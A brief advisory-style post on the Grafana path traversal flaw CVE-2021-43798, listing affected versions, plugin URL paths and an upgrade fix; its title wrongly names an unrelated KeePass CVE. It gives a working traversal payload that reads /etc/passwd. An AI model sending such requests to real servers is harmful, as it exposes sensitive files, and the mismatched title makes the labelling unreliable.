CVE-2023-24055 KeePass
January 30, 2023
1 min
On December 4, 2021, a security researcher revealed an arbitrary file reading vulnerability in Grafana on the Internet.
Unauthorized attackers can use this vulnerability to obtain sensitive files on the server.
The vulnerability CVE-2021-43798 have a 7.5 CVSS score.
Affected version : Grafana 8.0.0 to 8.3.0
The vulnerable URL path :
<grafana_host_url>/public/plugins/alertlist/<grafana_host_url>/public/plugins/annolist/<grafana_host_url>/public/plugins/barchart/<grafana_host_url>/public/plugins/bargauge/<grafana_host_url>/public/plugins/candlestick/<grafana_host_url>/public/plugins/cloudwatch/<grafana_host_url>/public/plugins/dashlist/<grafana_host_url>/public/plugins/elasticsearch/<grafana_host_url>/public/plugins/gauge/<grafana_host_url>/public/plugins/geomap/<grafana_host_url>/public/plugins/gettingstarted/<grafana_host_url>/public/plugins/grafana-azure-monitor-datasource/<grafana_host_url>/public/plugins/graph/<grafana_host_url>/public/plugins/heatmap/<grafana_host_url>/public/plugins/histogram/<grafana_host_url>/public/plugins/influxdb/<grafana_host_url>/public/plugins/jaeger/<grafana_host_url>/public/plugins/logs/<grafana_host_url>/public/plugins/loki/<grafana_host_url>/public/plugins/mssql/<grafana_host_url>/public/plugins/mysql/<grafana_host_url>/public/plugins/news/<grafana_host_url>/public/plugins/nodeGraph/<grafana_host_url>/public/plugins/opentsdb<grafana_host_url>/public/plugins/piechart/<grafana_host_url>/public/plugins/pluginlist/<grafana_host_url>/public/plugins/postgres/<grafana_host_url>/public/plugins/prometheus/<grafana_host_url>/public/plugins/stackdriver/<grafana_host_url>/public/plugins/stat/<grafana_host_url>/public/plugins/state-timeline/<grafana_host_url>/public/plugins/status-history/<grafana_host_url>/public/plugins/table/<grafana_host_url>/public/plugins/table-old/<grafana_host_url>/public/plugins/tempo/<grafana_host_url>/public/plugins/testdata/<grafana_host_url>/public/plugins/text/<grafana_host_url>/public/plugins/timeseries/<grafana_host_url>/public/plugins/welcome/<grafana_host_url>/public/plugins/zipkin/
How to exploit :
$HOST/public/plugins/graph/../../../../../../../../etc/passwd
Solutions and mitigations :
All installations between v8.0.0-beta1 and v8.3.0 should be upgraded as soon as possible.